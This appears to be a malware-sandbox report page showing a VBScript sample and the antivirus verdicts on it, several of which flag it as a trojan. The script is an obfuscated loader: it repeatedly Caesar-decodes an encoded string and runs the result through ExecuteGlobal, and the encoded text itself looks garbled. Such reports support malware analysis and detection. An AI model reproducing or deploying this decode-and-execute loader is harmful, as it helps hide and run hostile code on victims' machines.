Static | ZeroBOX
No static analysis available.
Function Decode(data, shiftValue)
Dim decodedData, charCode, decipheredData
decodedData = ""
decipheredData = ""
' Reverse the Caesar Cipher encryption
For i = 1 To Len(data)
charCode = Asc(Mid(data, i, 1))
If (charCode >= Asc("a") And charCode <= Asc("z")) Then
decipheredData = decipheredData & Chr((charCode - Asc("a") - shiftValue + 26) Mod 26 + Asc("a"))
ElseIf (charCode >= Asc("A") And charCode <= Asc("Z")) Then
decipheredData = decipheredData & Chr((charCode - Asc("A") - shiftValue + 26) Mod 26 + Asc("A"))
Else
decipheredData = decipheredData & Chr(charCode)
End If
Next
' Reverse the initial encoding loop
For i = 1 To Len(decipheredData)
charCode = Asc(Mid(decipheredData, i, 1))
charCode = charCode - shiftValue
' Keep the charCode within the range of 0 to 255
If charCode < 0 Then
charCode = charCode + 256
ElseIf charCode > 255 Then
charCode = charCode - 256
End If
decodedData = decodedData & Chr(charCode)
Next
Decode = decodedData
End Function
Dim encodedData, decodedData
encodedData = "[
g|V<sf
Gsqqer{V<gs{|)&)&j|
g|<n<x|
B>L)&j|
t<n<sf
encodedData = encodedData + "L)&sf
<n<Z)&)&j|
>L)&)&J<[|
<gsqqer{)&t
Gsqqer{<n<>ts
<W\T<F
``{ZOW{]
OW^B{fWPAAgWg|`hZ]PPe^^AX"
encodedData = encodedData + "
``{c{f|fPeAh
ehZ^]fOfe
]ZZA|___|A^fZX
{JVJzJLX
eg|KJ{e
JLl>)&)&J<F
|<gs{|<{
)&gs{|<n<>|
r<n<sf
|K>>><I<t
encodedData = encodedData + "sqqer{<I<>>>V<R
L>)&)&J<\
|<gs{|)&\
<gs{|)&)&G
>LXSt|r~|
Req|V<BLX
<>>T[w<
|{>>>)&)&"
decodedData = Decode(encodedData, 7)
decodedData = Decode(decodedData, 7)
decodedData = Decode(decodedData, 7)
decodedData = Decode(decodedData, 7)
decodedData1 = Decode(decodedData, 7)
decodedData2 = Decode(decodedData, 7)
decodedData3 = Decode(decodedData, 7)
call ExecuteGlobal (decodedData)
WScript.Quit
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan VB:Trojan.Valyria.8238
ClamAV Clean
FireEye VB:Trojan.Valyria.8238
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren Clean
Symantec Clean
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Script.Generic
BitDefender Clean
NANO-Antivirus Clean
SUPERAntiSpyware Clean
Rising Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Emsisoft Clean
GData VB:Trojan.Valyria.8238
Jiangmin Clean
Avira Clean
MAX malware (ai score=84)
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
ViRobot Clean
ZoneAlarm HEUR:Trojan.Script.Generic
Microsoft Trojan:Script/Wacatac.B!ml
Google Clean
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet VBS/Agent.9693!tr
BitDefenderTheta Clean
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.